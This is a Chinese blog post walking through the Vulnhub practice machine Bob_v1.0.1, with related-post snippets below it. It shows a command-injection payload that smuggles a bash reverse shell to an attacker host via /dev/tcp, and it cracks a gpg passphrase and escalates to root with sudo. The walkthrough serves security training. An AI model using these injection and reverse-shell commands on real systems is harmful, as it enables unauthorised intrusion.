bob_v1.0.1

最新推荐文章于 2024-10-02 15:25:16 发布
最新推荐文章于 2024-10-02 15:25:16 发布
阅读量213 收藏 2
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73074638/article/details/141036469
版权

1.信息收集

端口扫描

nmap -A -p- 192.168.7.204

目录扫描

访问web服务

robots.txt文件

尝试拼接访问

尝试测试漏洞输入whoami,发现存在漏洞

执行whoami | ls ,发现备份文件

直接访问可以下载

2.getshell

nc反弹

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.7.67/4444 0>&1" | bash

3.提权

cd /home

ls-al

查看文件

cd Documents

/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh -> 查看文件内容 -> 不知道干嘛的,找了点文献才知道是“藏头诗”得到密钥:【HARPOCRATES

gpg -d login.txt.gpg 解密,没有权限

cd /home/bob/Documents/

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

ssh bob@192.168.7.152 -p 25468

sudo su提权

pingyao周杰伦
关注
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 516
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
Bob_v1.0.1
weixin_52953960的博客
08-05 330
步骤五:在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh 文件,查看其中内容,是藏头诗,密钥为。步骤四:在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret,解密文件失败,权限不够。步骤三:执行 whoami | ls ,发现备份文件,下载查看,看到过滤了一些命令。步骤八:登录bob用户,sudo -l 查看权限,显示为 all。
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 3028
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 330
【代码】Bob_v1.0.1靶机渗透测试。
Bob_v1.0.1靶机
hqy250019的博客
08-07 456
在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh。cd到home目录下,查看,发现有四个用户的家目录,先到bob目录下查看,发现一个可能存在密码的文件.old_passwordfile.html。dev_shell.php页面发现存在过滤,一些命令无法执行,执行whoami | ls,发现一个备份文件。查看文件内容,没看懂,网上搜了一下,是藏头诗,密钥为 HARPOCRATES。
Bob_v1.0.1靶机复现
weixin_52956666的博客
08-07 273
发现里面说有一个没有保护的shell,电子邮件中包含该shell。有回显,尝试注入一句话木马,发现有的命令不能够执行。切换到家目录,发现有四个用户,切换到bob用户中。之前扫描端口的时候发现ssh开放端口是25468。靶机IP为192.168.112.169。发现可以执行所有操作,直接sudo su。因为免密操作发现有ssh功能,尝试登陆。发现了一个可执行的notes.sh文件。发现还是得从命令执行的地方找突破口。发现首字母都是大写,可能是藏头诗。发现有一个疑似存放密码的地方。sudo -l查看免密操作。
vulnbub系列:Bob_v1.0.1
jq_j37的博客
08-03 358
vulnbub系列:Bob_v1.0.1靶机,打靶文章
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 412
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 306
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
CleanCodeHandbook_v1.0.1.pdf.zip_CleanCodeHandbook_leetcode
07-14
而“CleanCodeHandbook_v1.0.1.pdf.zip”这个压缩包文件包含了这本书的PDF版本,版本号为1.0.1,可能包含了一些更新或修订的内容。 “CleanCodeHandbook_leetcode”标签则表明这个压缩包与LeetCode平台相关。...
BOB1.0.1靶机渗透攻略.pdf
09-21
本篇文档详细介绍了针对名为 Bob 1.0.1 的靶机进行渗透攻击的实战攻略。靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap ...
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1186
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
【网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 152
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1081
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
web安全】——sql注入
wxh的博客
09-27 1352
在mysql5版本以后,为了方便管理,默认定义了information_schema数据库,用来存储数据库元数据信息。schemata(数据库名)、tables(表名tableschema)、columns(列名或字段名)。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 852
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
【完-网络安全】Windows注册表
Ryoujou的博客
09-29 378
Windows注册表
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-29 2109
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
hc32f030_ide_rev1.0.1
06-06
hc32f030_ide_rev1.0.1是一款集成开发环境(IDE),用于hc32f030系列单片机的开发。它由华大基础(HDP)公司开发,可用于Windows操作系统。hc32f030_ide_rev1.0.1提供了代码编辑、编译、调试等功能,支持多种编程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值